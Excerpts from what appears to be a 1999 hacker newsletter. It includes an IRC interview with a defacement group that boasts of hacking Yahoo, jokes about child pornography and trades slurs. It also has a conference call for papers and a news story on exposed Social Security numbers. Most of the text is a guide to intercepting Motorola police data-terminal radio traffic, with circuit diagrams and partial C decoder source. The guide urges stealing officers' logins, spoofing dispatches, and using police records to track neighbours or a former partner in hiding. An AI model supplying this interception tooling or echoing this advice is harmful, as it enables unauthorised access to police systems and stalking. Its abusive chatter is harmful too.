yahoo, did take place and was committed by members of Goat [^Dreamer] why did you target yahoo? any specific reason [chemmy] yahoo is gay [chemmy] I hate the name [Debris] like the altered index.htm said, We were looking for porn and found pictures of billy boy [^Dreamer] gotcha, well if ya ever want porn ive got mad pics (and no theres no child porn ) [Debris] well we only want child porn [Debris] and for the record, EHAP can suck my underaged cock [chemmy] and gr0wn grand pa's. [Debris] sorry RS... [^Dreamer] anyone else youd like to send your deepest regards too? just what groups/ppl do u like? [Debris] yes [^Dreamer] i understand that you hate dalnet, is this true and y? [^Dreamer] am gettin ahead of myself [Debris] I dont hate dalnet but i never go on it [chemmy] I am in X-Forces so therefore I LIKE ALL MY FRIEEEEEEENDS! [^Dreamer] does x-forces have a homepage? [Debris] ya, werd to #freaks, m1les, X-forces, Script kiddies inc (which im in and some texts i wrote are there) and #webfringe [chemmy] x-forces.com but it sucks [^Dreamer] alright. [chemmy] We're actually doing a new design (BTW it sucked cuz I wanna implicated it in =) ) [Debris] some stuff i wrote is at www.nuclearbomb.com/ski [chemmy] And the x-forces serv hosts goat's page [chemmy] So if debris tries anals attempts on me [chemmy] It drops [^Dreamer] haha [^Dreamer] you guys are just too crazy [Debris] shutup you stupid seperatist [chemmy] DIE CANADA DIE [chemmy] Yes [Debris] DIE FRENCH WHORE [^Dreamer] anything youd like to end in closing? [chemmy] Yes [Debris] yes [^Dreamer] shoot [chemmy] WE WILL OWN THE UNIVERSE@&*^#@ [Debris] my turn [chemmy] I plan on dominating the world [Debris] IL MAY BE GOING TO JAIL TOMORROW SO...... FREE I-L, FREE GOAT! [^Dreamer] goin to jail for? [Debris] assault [^Dreamer] o one more thing [Debris] what [^Dreamer] what was the url of that site that goat security owned tongiht? [Debris] that wasnt goat [Debris] that was opt1k [chemmy] des-con-systems.com [chemmy] Ya [Debris] opt1k aint no goat [^Dreamer] yes. what was that site origianlly? [Debris] goat owned that site first [Debris] 3 days ago [^Dreamer] and y did ya target it? [chemmy] Ask opt1k [Debris] because it was easy, and our premade scripts supported irt [chemmy] And note that tomorrow or day after me & ech0 release a nice prog [^Dreamer] where can we get the prog? [Debris] no its not [Debris] itsa gay prog, your making so ken will hump you [chemmy] We'll release it to friends first then public if any site wants it :> [chemmy] No deb you jealous you fuck! [chemmy] I'm gonna haxor you with it [chemmy] CUZ EYE AM A SCRIPT KIDDIE [^Dreamer] you can put it no solarz.net/hrc [chemmy] Okay [chemmy] We will [Debris] it will be released on goat first [^Dreamer] alright then [Debris] goat.sphix.com [chemmy] Shut up deb you aint c0ding it [chemmy] =) [chemmy] Dreamer how old are you? [^Dreamer] what will this prog do? [Debris] im gunna code something better thab it [chemmy] Debris, lol [Debris] itll will auto phf [^Dreamer] what os'es suppoort it [^Dreamer] im 18 [Debris] goat0s [chemmy] It will detect and report ONLY exploitable services..not only the open one [chemmy] And auto remote exploit it [chemmy] Tested on linux for now [^Dreamer] sounds good for lazy ppl [Debris] tested? [Debris] ahaha [Debris] it cant even connect yet [chemmy] No, sounds good for script kiddies [Debris] duh whatsa socket [chemmy] Debris, DID I SAY IT WAS FINISHED? [Debris] YES [chemmy] NO [chemmy] I SAID TOMORROW OR DAY AFTER [chemmy] YEW CUNT [Debris] shut the fuck up you worthless piece of shit [chemmy] I'm gonna slap a dick in your face you goat whore [Debris] UDP KIDDIE MUASHASHASHAAHS [^Dreamer] ok am done with you [Debris] GOOD [^Dreamer] thanks guys i appreciate it [chemmy] lol [chemmy] ok ööö [part(#goating)] Debris (~Debris@ppp-5800-02b-3102.mtl.total.net) [chemmy] Cya ööö [part(#goating)] ^Dreamer (barry@ts0800.hhs.net) Session Close: Sun Mar 21 22:33:25 1999 @HWA 27.0 Year 2000 Network and Distributed System Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ForwardedFrom: "Jay D. Dyson" Courtesy of Cryptography List. Originally From: "David M. Balenson" C A L L F O R P A P E R S The Internet Society Year 2000 Network and Distributed System Security Symposium (NDSS 2000) Catamaran Resort Hotel, San Diego, California February 2-4, 2000 IMPORTANT DATES: Paper and panel submissions due: June 16, 1999 Author notification: August 17, 1999 Final versions of papers and panels due: October 15, 1999 GOAL: This symposium aims to foster information exchange among researchers and practitioners of network and distributed system security services. The intended audience includes those who are interested in practical aspects of network and distributed system security, with the focus on actual system design and implementation, rather than theory. A major goal of the symposium is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technology. The proceedings of the symposium will be published by the Internet Society. Submissions are solicited for, but are not limited to, the following topics: * Secure Electronic Commerce, e.g., payment, barter, EDI, notarization/timestamping, endorsement and licensing. * Intellectual Property Protection: protocols, schemas, implementations, metering, watermarking, other forms of rights management. * Implementation, deployment and management of network security policies. * Integrating Security in Internet protocols: routing, naming, TCP/IP, multicast, network management, and, of course, the Web. * Attack-resistant protocols and services. * Special problems and case studies: e.g. interplay and tradeoffs between security and efficiency, usability, reliability and cost. * Security for collaborative applications and services: tele- and video-conferencing, groupwork, etc. * Fundamental services: authentication, data integrity, confidentiality, authorization, non-repudiation, and availability. * Supporting mechanisms and APIs: key management and certification, revocation, audit trails and accountability. * Integrating security services with system and application security facilities and protocols, e.g., message handling, file transport/access, directories, time synchronization, data base management, boot services, mobile computing. * Security for emerging technologies -- sensor networks, specialized testbeds, wireless/mobile (and ad hoc) networks, personal communication systems, and large heterogeneous distributed systems. * Intrusion Avoidance, Detection, and Response: systems, experiences and architectures * Network Perimeter Controls: firewalls, packet filters, application gateways. BEST PAPER AWARD: A best paper award will be introduced at NDSS 2000. This award will be presented at the symposium to the authors of the best paper to be selected by the program committee. GENERAL CHAIR: Stephen Welke, Trusted Computer Solutions PROGRAM CO-CHAIRS: Gene Tsudik, USC / Information Sciences Institute Avi Rubin, AT&T Labs - Research TUTORIAL CHAIR: Doug Maughan, NSA / DARPA PROGRAM COMMITTEE: Bill Cheswick, Lucent Bell Labs Marc Dacier, IBM Research Zurich Jim Ellis, CMU / CERT Carl Ellison, Intel Ed Felten, Princeton Virgil Gligor, UMD College Park Thomas Hardjono, Bay Networks/Nortel Cynthia Irvine, Naval Postgraduate School Charlie Kaufman, Iris Associates Dave Kormann, AT&T Labs - Research Hugo Krawczyk, Technion and IBM Carl Landwehr, Naval Research Lab Doug Maughan, NSA / DARPA Gary McGraw, Reliable Software Technologies Sandra Murphy, TIS Labs at Network Associates Clifford Neuman, USC / Information Sciences Institute Paul Van Oorschot, Entrust Sami Saydjari, DARPA ISO David Wagner, UC Berkeley Bennet Yee, UC San Diego LOCAL ARRANGEMENTS CHAIR: Thomas Hutton, San Diego Supercomputer Center PUBLICATIONS CHAIR: John Kochmar, SEI PUBLICITY CHAIR: David Balenson, TIS Labs at Network Associates LOGISTICS CHAIR: Carla Rosenfeld, Internet Society REGISTRATIONS CHAIR Beth Strait, Internet Society SUBMISSIONS: The committee invites both technical papers and panel proposals. Technical papers should be at most 20 pages long. Panel proposals should be at most two pages and should describe the topic, identify the panel chair, explain the format of the panel, and list three to four potential panelists. Technical papers will appear in the proceedings. A description of each panel will appear in the proceedings, and may -- at the discretion of the panel chair -- include written position statements from the panelists. Each submission must contain a separate title page with the type of submission (paper or panel), the title or topic, the names of the author(s), organizational affiliation(s), telephone and FAX numbers, postal addresses, e-mail addresses, and must specify the contact author in case of multi-author submissions. The names of authors, affiliations, and other identifying information should appear only on the separate title page. Submissions must be received by June 16, 1999, and must be made via electronic mail in either PostScript or ASCII format. If the committee is unable to print a PostScript submission, a hardcopy will be requested. Therefore, PostScript submissions must arrive well before the deadline. All submissions and program related correspondence (only) should be directed to the program chair: Gene Tsudik USC Information Sciences Institute 4676 Admiralty Way Marina Del Rey, CA 90292 Email: ndss00@isi.edu TEL: +1 (310) 822-1511 ext 329 FAX: +1 (310) 823-6714 Dates, final call for papers, advance program, and registration information will be available soon at the URL: httl//www.isoc.org/ndss2000. Each submission will be acknowledged by e-mail. If acknowledgment is not received within seven days, please contact the program chair as indicated above. Authors and panelists will be notified of acceptance by August 17, 1999. Instructions for preparing camera-ready copy for the proceedings will be sent at that time. The camera-ready copy must be received by October 15, 1999. - ---------------------------------------------------------------------- David M. Balenson, Cryptographic Technologies Group TIS Labs at Network Associates, Inc. 3060 Washington Road, Suite 100, Glenwood, MD 21738 USA balenson@tislabs.com; 443-259-2358; fax 301-854-4731 pgp fingerprints FD53 918E 097A 2579 C1A8 34F8 E05D E74F AC1D E184 (DSS/DH) D43B 565B 2C0E 90F4 38BB D9EA 1454 3264 (RSA) @HWA 28.0 Billionaires social security numbers listed on net (Yes Gates is here too) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC still listing Social Security IDs By Courtney Macavinta Staff Writer, CNET News.com March 23, 1999, 4:00 a.m. PT The Social Security numbers of many billionaire executives, including Bill Gates, are still listed on the Internet nearly two years after the Securities and Exchange Commission ceased collecting them on certain public forms. High-tech moguls have voluntarily included their Social Security numbers in filings documenting their stock ownership that were later made freely available on the SEC's Web site, as CNET News.com reported in 1997. Fearing that the Net made it too easy to exploit personal information, the SEC revised its rules in June 1997 and said it would no longer accept Social Security numbers on those forms. Nonetheless, News.com found old filings--and in some cases documents filed after the rule change--that still include the numbers of corporate officers at public companies. If the nine-digit numbers fall into the wrong hands, they can be used to obtain such information as current and previous addresses, employment histories, or credit reports--which, in turn, can unlock other private data such as bank account numbers. In addition to Microsoft's chairman Gates and cofounder Paul Allen, Intel cofounder Gordon Moore and Gateway founder Ted Waitt are among the members of the billionaire club whose Social Security numbers remain easily accessible through the SEC's EDGAR database. The Social Security numbers of Gates, Allen, and Moore were found on forms filed before the summer of 1997, but Waitt's number was accepted on a February 1998 filing, after the SEC changed its policy. Social Security numbers were created to track earnings and Social Security benefits. But the unique numbers are now used for much more, leading privacy organizations to argue that the SEC has a moral obligation to stop publishing them on the Net. "The SSN is the way that everybody's financial records are kept together," said Jodie Beebe, a spokesman for the Privacy Rights Clearinghouse. "If somebody gets a copy of your SSN, they can get utilities hooked up, rack up several credit cards, establish employment--and your credit report can be ruined," she added. "Identity theft can wreak havoc in your life." Microsoft would not comment about the exposure of Gates's Social Security number, though privacy concerns are nothing new to the company. The software giant and Intel--its chipmaking partner in the Wintel PC juggernaut--found themselves at the center of recent computer privacy concerns when it was revealed that their products could be used to track Net users' activities. In fact, anxiety over the increasing loss of privacy in the information age is at an all-time high, with many lawmakers and consumer advocates calling for industry and government to more closely guard personally identifiable information, which is solicited by Web sites, compiled by database creators or resold in digital format. The SEC is also worried about inadvertently playing a part in identity theft or other privacy breaches. "With the growth of the EDGAR database, and its availability to millions of viewers on the commission's Web site, the commission is concerned that these numbers are too readily available," the SEC stated in its June 1997 rule change. "The usefulness of Social Security numbers filers voluntarily provide on these forms is outweighed by the risk of misuse created by the disclosure of those numbers." Still, the SEC has no plans to remove documents from its online archive that include the numbers, spokesman John Heine said yesterday. "We can't alter those forms. They are a matter of public record," he said. @HWA 29.0 The Doghouse -- Motorola's MDC-4800 Police Data Terminal ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Cryptogram I'd grab this software before it becomes too well known and pulled from the site ... - Ed There's a Windows program that decodes the police car mobile data terminal transmissions. If you thought listening in on police radio frequencies was interesting, you should see what comes over on those data transcripts. Motorola's "encryption" wasn't designed for privacy, it's more like a checksum for transmission integrity. Basically, it's XOR. The software is free, although there is this helpful notice on the Web site: "Decoding MDT transmissions may be illegal in some countries, you may want to check the laws for your country before using this program." http://www.geocities.com/ResearchTriangle/Facility/7646/ From the site; How to decode the MDC 4800 Protocol Greetings one and all, Have you ever lusted to decode Mobile Data Terminal (MDT) tranmissions? Have you ever wanted to see the same NCIC and motor vehicle information that law enforcement officers see? Have you ever wanted to see what officers send to each other over "private" channels? And all this with an interface you can build with only a few dollars worth of parts from your local radio shack? If so this posting might be your rendevous with destiny. The tail end of this posting includes the source code of a program that decodes and displays MDT messages. It stores roughly 30k of messages in a buffer and then writes the whole buffer to a file called "data.dat" before terminating. The program may be interrupted at any time by pressing any key (don't use control-c) at which point it writes the partially filled buffer to "data.dat". This program only works for systems built by Motorola using the MDC4800 tranmission protocol. This accounts for a large fraction of public service MDT systems as well other private systems. The existence of this program is ample evidence that Motorola has misrepresented its MDT systems when it marketed them as a secure means of communcications. The interested reader will soon discover that these systems do not use any form of encryption. Security concerns instead have been dealt with by using a code. "And what might this code be called?" asks the reader. The code turns out to be plain ASCII. What follows is a brief description of how the program and the MDC4800 protocol work. If you don't understand something go to your local library and check out a telecommunications theory book. 1. The raw transmission rate is 4800 baud. The program's interrupt service routine simply keeps track of the time between transitions. If you're receiving a perfect signal this will be some multiple of 1/4800 seconds which would then give you how many bits were high or low. Since this is not the best of all possible worlds the program instead does the following: transitions are used to synchronize a bit clock. One only samples whenever this clock is in the middle of the bit to produce the raw data stream. This greatly reduces jitter effects. 2. Whenever a tranmitter keys up the MDC4800 protocol calls for bit synchronization (a sequence of 1010101010101010....). In the program this will result in receive bit clock synchronization. There is no need to specifically look for the bit sync. 3. Look for frame synchronization in raw bit stream so that data frames can be broken apart. Frame synchronization consists of a 40 bit sequence : 0000011100001001001010100100010001101111. If this sequence is detected (or 35 out of 40 bits match up in the program) the system is idling and the next 112 bit data block is ignored by the program. If the inverted frame sync is detected one immediately knows that 112 bit data blocks will follow. 4. Receive the 112 bit data block and undo the bit interleave. This means that one must reorder the bits in the following sequence : {0,16, 32,48,64,80,96,1,17,33,49,65,81,97,2,18,34,...} if the orignal sequence were received as {0,1,2,3,4,5,6,7,8,...}. 5. Check the convolutional error correcting code and count the number of errors. The error correcting code is rate 1/2 which means we will be left with 56 data bytes. The encoder is constructed so that the output consists of the original data bits interspersed with error correcting code. The generating polynomial used is : 1 + X^-1 + X^-5 + X^-6 Whenever an error is detected a counter is incremented. An attempt is made to correct some errors by finding the syndrome and looking for the bogus bit. 6. Keep receiving 112 bit data blocks until either a new frame sync is found or two consecutive data blocks have an unacceptably large number of errors. 7. Each data block consists of six data bytes; the last 8 bits are status bits that are simply ignored. The program shows the data in two columns - hexadecimal and ASCII. This data is kept in a buffer and is written to the file "data.dat" when the program terminates. 8. What the program doesn't do: As a further check on the data there can be CRC checks. This varies from protocol to protocol so this program does not implement the CRC checks. Nonetheless, it is a relatively trivial matter to find the generating polynomial. The addresses, block counts, and message ID numbers are also quite easy to deduce. As you can see, there is no encryption. The bit interleave and the error correcting coding are there solely to insure the integrity of the ASCII data. Since any moron could have figured this stuff out from scratch one could argue that MDTs do not use "...modulation parameters intentionally witheld from the public". Therefore the Electronic Communications Privacy Act may not prohibit receiving MDT tranmissions. However, consult your attorney to make sure. The total disregard for security will no doubt annoy countless Motorola customers who were assured that their MDT systems were secure. Since Federal law states that NCIC information must be encrypted your local law enforcement agency might be forced to spend millions of dollars to upgrade to a secure MDT system - much to the delight of Motorola and its stockholders. Cynics might conclude that the release of a program like this is timed to coincide with the market saturation of existing MDT systems. Also, this program is completely free and it had better stay that way. What's to prevent you from adapting this into a kit and selling it from classified ads in the back of Nuts and Volts? Nothing. But take a look at Motorola's patents sometime. You'll notice that this program does things that are covered by a shitload of patents. So any attempt to take financial advantage of this situtation will result in utter misery. Please keep the following in mind: this program only works with the first serial port (COM1). If your mouse or modem is there too bad. If you don't like this rewrite the program. ------------------------------------------------------------------------ What equipment do I need? RADIO SCANNER: A scanner that can receive 850-869 MHz. For those of you who don't know, this is the band where most business and public service trunked radio systems can be found along with the mobile data terminal transmissions. Chances are excellent that if your local authorities have a motorola trunked radio system and mobile data terminals that this is the frequency band in use. Very rarely will one find mobile data terminals in other frequency bands. Now for the fun part - your scanner should probably be modified to allow you to tap off directly from the discriminator output. If you wait until the signal has gone through the radio's internal audio filtering the waveform will likely be too heavily distorted to be decoded. This is exactly the same problem that our friends who like to decode pager transmissions run into - some of them have claimed they can only decode 512 baud pager messages using the earphone output of their scanner. These mobile data terminal messages are 4800 baud so I don't think you have a snowball's chance in hell without using the discriminator output. If you don't know where to begin modifying your scanner you might want to ask those who monitor pagers how to get the discriminator output for your particular radio. COMPUTER/SCANNER INTERFACE Those of you who have already built your interface for decoding pager messages should be able to use that interface without any further ado. For those starting from scratch - you might want to check out packages intended for pager decoding such as PD203 and the interfaces they describe. The following excerpt gives an example of a decoder that should work just fine (lifted out of the PD203 POCSAG pager decoder shareware documentation): > > 0.1 uF |\ +12v > ---||-----------------------|- \| > AF IN | |741 \ > ---- | | /--------------------- Data Out > | \ ------|+ /| | CTS (pin 5/8) > | / 100K | |/-12v | or DSR (pin 6/6) > | \ | | > GND / ----/\/\/\---- GND ------ GND (pin 7/5) > | | 100K > | \ N.B. Pin Numbers for com port are > GND / given as x/y, where x is for a 25 > \ 10K way, y for a 9 way. > / > | > GND > This needs a mod - It is far to deaf as this. Remove the 10k resistor and replace it with a 470 ohm preset and 560 ohm fixed in series. Audio level is critical in the pd203 that he refers to ! - dg > The above circuit is a Schmitt Trigger, having thresholds of about +/- 1v. balls - its nearer to 3 to 4 volts p-p! (dg) > If such a large threshold is not required, eg for a discriminator output, > then the level of positive feedback may be reduced by either reducing the > value of the 10K resistor or by increasing the value of the 100K feedback > resistor. > > The +/- 12v for the op-amp can be derived from unused signals on the COM > port (gives more like +/- 10v but works fine !):- > > > TxD (2/3) --------------|<-------------------------------------- -12v > | | > RTS (4/7) --------------|<-------- GND - - > | | _ + 10uF > --------->|------- - - | > Diodes 1N4148 | - + 10uF GND > | | > DTR (20/4) ------------->|-------------------------------------- +12v > If I were building this circuit I would strongly suggest tying the non-inverting (+) input of the op-amp to ground since you are working directly with the discriminator output and don't need a Schmitt trigger. All these parts or equivalents are easily available (even at your local Radio Shack which stocks the finest collection of components that have failed the manufacturer's quality control checks and supported by a sales staff that's always got the wrong answers to your questions). Also: DO NOT use the RI (ring indicator) as an input to the computer. ------------------------------------------------------------------------- How do I check things? As a first step, I would get a package such as PD203 and use it to decode a few pages. If you can get that working you know that that your interface circuit is functioning correctly. If you are in a reasonably sized town you might be part of the ardis network. The ardis network is a nationwide commercial mobile data terminal network where one can send/receive E-mail messages from one's portable computer. It has been exclusively assigned the frequency of 855.8375 MHz. Therefore, if you can hear digital bursts on this frequency you are basically guarranteed that these are MDC4800 type messages. You should be able to get stuff popping up on your screen although a lot of the messages will not be plain english. If your interface works but you can't seem to get any messages on the screen for a channel you know is a Motorola MDT system then it might be possible that your scanner/interface is putting out data with the polarity reversed. To check for this run the program with a command line arguement. When it runs you should an initial "Polarity reversed" message and hopefully then things will work out for you. Other than that: if this program doesn't work pester someone else who has got it working. Don't bother pestering the author(s) of this posting; the shit(s) aka "she/he/it (s)" are afraid of a thousand lawyers from Motorola descending like fleas to infest their pubic hair and accordingly have decided to remain forever anonymous. No doubt someone on the usenet who sees this post will know what to do with this program and also hopefully rewrite into a more user friendly form. When you do please don't forget to release the source code. ------------------------------------------------------------------------- Future projects/nightmares you might want to think about: Certain MDT systems embed formatting information in the text in the form of ESC plus [ plus a few more bytes. Someone might want to decode these on the fly and format the output so it looks exactly the same way as the user sees it. Make it so that this program works with com ports other than COM1. Make it user friendly? Enlarge the data buffer from the current 30k. Give the output data file an unique name each time the program is run instead of "data.dat". How about sorting through the past traffic so that you only see traffic to a specified user? The program does not cut data blocks off in the display but it might add an extra one or two (which will display as all zeroes). Someone might want to make all those zeroes be shown as blanks instead. Write some real instructions. Now the more ambitous stuff: Are you half-way competent with RF engineering? Then listen in to the tranmissions from the mobile units back to the base station. That way you get everyone's password and user IDs as they log on to the MDT system. By this point you will no doubt have been able to figure out all of the appropriate communications protocols so you should think about getting your own transmitter up and running along with the necessary program modifications so that you can transmit MDT messages. The required transmitter can be very simple - for example, those masocists who want to start from scratch might want to special order an appropriate crystal (pulling the frequency with the computer's tranmit signal), building a frequency multiplier chain, and adding a one watt RF amplifier to top it all off (see the appropriate ARRL publications for more information on radio techniques). Now you can log in and look at the criminal records and motor vehicle information on anybody you can think of. Find out what your neigbors are hiding. Find out who that asshole was that cut you off downtown. Find out where your former girl/boy friend is trying to hide from you. And on and on... Those with simpler tastes might want to simply transmit at the base station's frequency to any nearby MDT terminal - now you too can dispatch your local law enforcement agencies at the touch of your fingers!!! See your tax dollars at work tearing apart every seam of your neighbor's house. Or create strife and dissension in your local law enforcement agency as more and more officers come out of the closet using their MDTs trying to pick up fellow officers. There are municipalities that have put GPS receivers on all of their vehicles. Should it happen that the information is sent back over one of these networks you could have your computer give you a real-time map showing the position of every vehicle and how far away they are from you. Extend your knowledge to other data networks. Here you will want to look at the RAM mobile data network. It uses the MOBITEX protocol which is really easy to find information on. Since it is an 8 kilobaud GMSK signal there is a decent chance that you can use the interface described here. This transmission mode demmands much more from your equipment than MDT tranmissions. At the very least you must be much more careful to make sure you have adequate low frequency response. Despite this it is possible to receive and decode MOBITEX transmissions with a simple op-amp circuit! This just goes to show you what drivelling bullshit RAM's homepage is filled with - they explain in great detail how hackers will never be able to intercept user's radio tranmissions (incidentally explaining how to decode their tranmissions). The necessary program will be the proverbial exercise left for the reader. For better performance buy a dedicated MOBITEX modem chip and hook it up to your computer. ----------------------------------------------------------------------- A few words about the program: Remember - you must have your decoder hooked up to COM1. The RTS line will be positive and the DTR line negative but if you built the decoder with a bridge rectifier you really don't have to worry about their polarity. Stop the program by punching any key; don't use control-c or control-break! If you must reverse polarity run the program with any command line arguement (example: type in "mdt x" at the command line if your program is mdt.exe). You should then see the "Polarity Reversed." message pop up and hopefully things will then work. As far as compiling this - save the latter portion of this posting (the program listing) and feed it to a C compiler. Pretty much any C compiler from Borland should work. If you (Heaven Forbid) use a Microsoft C compiler you might need to rename some calls such as outport. Follow any special instructions for programs using their own interrupt service routines. This program is not object oriented. It also does not want anything whatsoever to do with Windows. Please don't even think about running this program under Windows. Finally, here it is: ---------------------- C u t H e r e ! ! ! -------------------------- /* start of program listing */ #include #include #include #include /* Purpose of program: receive messages using the Motorola MDC4800 */ /* protocol and show them on the screen */ /* */ /* WARNING TO ALL : This program is free. Please distribute and modify*/ /* this program. I only request that you always include the source */ /* code so that others may also learn and add improvements. The */ /* status of this program at the time of the original release is : */ /* it doesn't have much in the way of a user interface or options but */ /* it should work if you follow the procedure in the text file. Don't */ /* expect any sort of support (you get what you pay for - nothing in */ /* this case). Finally, here's a special message to all of you who */ /* might have the urge to try to make money with this information: */ /* I know where you live. I will shave your pets and pour rubbing */ /* alcohol all over them (unless said pet happens to be a Rottweiler).*/ /* I will have sex with your wife while you off at work; on the rare */ /* occasions when you have sex with your wife she will in the throes */ /* of passion cry not your name but mine. I will sell drugs to the */ /* demented spawn you refer to as your children. And if that's not */ /* enough for you let a thousand lawyers from motorola descend on you */ /* and pound your fat rear end so far into the ground that it finally */ /* sees daylight again somewhere in Australia. */ /* */ /* */ /* General tidbits (a few of those "Why were things done this way */ /* questions). */ /* 1. Why is captured data kept in an array and only written to a */ /* disk file at the very end? Because disk access seems unreliable */ /* when so much time is taken up by the background interrupt service */ /* routine. */ /* 2. Why is the array storing this so small? Because yours truly was */ /* too damn lazy to use a pointer and allocate a huge chunk of memory.*/ /* (Hint for those of you who would like to improve this. */ /*--------------------------------------------------------------------*/ /* global variables */ int lc=0; char fob[30000];/* output buffer for captured data to be sent to disk */ int foblen=29900; int fobp=0; /* pointer to current position in array fob */ char ob[1000]; /* output buffer for packet before being sent to screen */ int obp=0; /* pointer to current position in array ob */ static unsigned int buflen= 15000; /* length of data buffer */ static volatile unsigned int cpstn = 0; /* current position in buffer */ static unsigned int fdata[15001] ; /* frequency data array */ void interrupt (*oldfuncc) (); /* vector to old com port interrupt */ /**********************************************************************/ /* this is serial com port interrupt */ /* we assume here that it only gets called when one of the status */ /* lines on the serial port changes (that's all you have hooked up). */ /* All this handler does is read the system timer (which increments */ /* every 840 nanoseconds) and stores it in the fdata array. The MSB */ /* is set to indicate whether the status line is zero. In this way */ /* the fdata array is continuously updated with the appropriate the */ /* length and polarity of each data pulse for further processing by */ /* the main program. */ void interrupt com1int() { static unsigned int d1,d2,ltick,tick,dtick; /* the system timer is a 16 bit counter whose value counts down */ /* from 65535 to zero and repeats ad nauseum. For those who really */ /* care, every time the count reaches zero the system timer */ /* interrupt is called (remember that thing that gets called every */ /* 55 milliseconds and does housekeeping such as checking the */ /* keyboard. */ outportb (0x43, 0x00); /* latch counter until we read it */ d1 = inportb (0x40); /* get low count */ d2 = inportb (0x40); /* get high count */ /* get difference between current, last counter reading */ tick = (d2 << 8) + d1; dtick = ltick - tick; ltick = tick; if ((inportb(0x3fe) & 0xF0) > 0) dtick = dtick ^ 0x8000; else dtick = dtick & 0x3fff; fdata[cpstn] = dtick; /* put freq in fdata array */ cpstn ++; /* increment data buffer pointer */ if (cpstn>buflen) cpstn=0; /* make sure cpstn doesnt leave array */ d1 = inportb (0x03fa); /* clear IIR */ d1 = inportb (0x03fd); /* clear LSR */ d1 = inportb (0x03fe); /* clear MSR */ d1 = inportb (0x03f8); /* clear RX */ outportb (0x20, 0x20); /* this is the END OF INTERRUPT SIGNAL */ /* "... that's all folks!!!!" */ } void set8250 () /* sets up the 8250 UART */ { static unsigned int t; outportb (0x03fb, 0x00); /* set IER on 0x03f9 */ outportb (0x03f9, 0x08); /* enable MODEM STATUS INTERRUPT */ outportb (0x03fc, 0x0a); /* push up RTS, DOWN DTR */ t = inportb(0x03fd); /* clear LSR */ t = inportb(0x03f8); /* clear RX */ t = inportb(0x03fe); /* clear MSR */ t = inportb(0x03fa); /* clear IID */ t = inportb(0x03fa); /* clear IID - again to make sure */ } void set8253() /* set up the 8253 timer chip */ { /* NOTE: ctr zero, the one we are using*/ /* is incremented every 840nSec, is */ /* main system time keeper for dos */ outportb (0x43, 0x34); /* set ctr 0 to mode 2, binary */ outportb (0x40, 0x00); /* this gives us the max count */ outportb (0x40, 0x00); } /****************************************************************/ int pork(int l) { static int s=0,sl=0x0000,t1,asp=0,ll,k,v,b,tap,synd=0,nsy; static char line[200]; /* array used to format 112 bit data chunks */ static int lc=0; /* pointer to position in array line */ if (l == -1) { /* printf (" %2i\n",asp); */ sl = 0x0000; s = 0; synd = 0; if ((asp <12) && (lc > 50)) { ll = 12 - asp; for (ll=0; ll<6; ll++) { v = 0; for (k=7; k>=0; k--) { b = line[ (ll<<3) +k ]; v = v << 1; if ( b == 49) v++; } ob[obp] = (char) v; if (obp < 999) obp++; } } lc = 0; tap = asp; asp = 0; return(tap); } else { s++; if (s==1) { line[lc] = (char) l; lc++; } /* update sliding buffer */ sl = sl << 1; sl = sl & 0x7fff; if (l == 49) sl++; if (s >1) { s = 0; if ((sl & 0x2000) > 0) t1 = 1; else t1 = 0; if ((sl & 0x0800) > 0) t1^=1; if ((sl & 0x0020) > 0) t1^=1; if ((sl & 0x0002) > 0) t1^=1; if ((sl & 0x0001) > 0) t1^=1; /* attempt to identify, correct certain erroneous bits */ synd = synd << 1; if (t1 == 0) { asp++; synd++; } nsy = 0; if ( (synd & 0x0001) > 0) nsy++; if ( (synd & 0x0004) > 0) nsy++; if ( (synd & 0x0020) > 0) nsy++; if ( (synd & 0x0040) > 0) nsy++; if ( nsy >= 3) /* assume bit is correctable */ { printf ("*"); synd = synd ^ 0x65; line[lc - 7] ^= 0x01; /**********************************************/ } } } return(0); } void shob() { int i1,i2,j1,j2,k1; /* update file output buffer */ i1 = obp / 18; if ( (obp-(i1*18)) > 0) i1++; fob[fobp] = (char) (i1 & 0xff); if (fobp < 29999) fobp++; for (i2 = obp; i2<=(obp+20); i2++) ob[i2] = 0; for (j1 = 0; j1 < i1; j1++) { for (j2 = 0; j2 < 18; j2++) { k1 = j2 + (j1*18); printf("%02X ", ob[k1] & 0xff); fob[fobp] = (char) (ob[k1] & 0xff); if (fobp < 29999) fobp++; } printf (" "); for (j2 = 0; j2 < 18; j2++) { k1 = j2 + (j1*18); if (ob[k1] >=32) printf("%c",ob[k1]); else printf("."); } printf("\n"); } obp=0; printf("BUFFER: %3i percent full\n",(int)(fobp/299.0)); } /**********************************************************************/ /* frame_sync */ /**********************************************************************/ /* this routine recieves the raw bit stream and tries to decode it */ /* the first step is frame synchronization - a particular 40 bit */ /* long sequence indicates the start of each data frame. Data frames */ /* are always 112 bits long. After each 112 bit chunk this routine */ /* tries to see if the message is finished (assumption - it's finished*/ /* if the 40 bit frame sync sequence is detected right after the end */ /* of the 112 bit data chunk). This routine also goes back to hunting */ /* for the frame sync when the routine processing the 112 bit data */ /* chunk decides there are too many errors (transmitter stopped or */ /* bit detection routine skipped or gained an extra bit). */ /* */ /* inputs are fed to this routine one bit at a time */ /* input : 48 - bit is a zero */ /* 49 - bit is a 1 */ void frame_sync(char gin) { static unsigned int s1=0,s2=0,s3=0,nm,j,t1,t2,t3,ns=0,st=0,n,m,l,chu=0,eef=0; static char ta[200]; if (st == 1) { ta[ns] = gin; ns++; if (ns >= 112) /* process 112 bit chunk */ { chu++; ns = 0; for (n= 0; n<16; n++) { for (m=0; m<7; m++) { l = n + (m<<4); pork(ta[l]); } } if (pork(-1) > 20) eef++; else eef=0; if (eef > 1) /* if two consecutive excess error chunks - bye */ { st = 0; shob(); eef = 0; } /* else eef = 0; */ } } /* s1,s2,s3 represent a 40 bit long buffer */ s1 = (s1 << 1) & 0xff; if ((s2 & 0x8000) > 0) s1++; s2 = (s2 << 1); if ((s3 & 0x8000) > 0) s2++; s3 = (s3 << 1); if (gin == 49) s3++; /* xor with 40 bit long sync word */ t1 = s1 ^ 0x0007; t2 = s2 ^ 0x092A; t3 = s3 ^ 0x446F; /* find how many bits match up */ /* currently : the frame sync indicates system id / idling / whatever */ /* inverted frame sync indicates message follows */ nm = 0; for (j=0; j<16; j++) { if (t1 & 1) nm++; if (t2 & 1) nm++; if 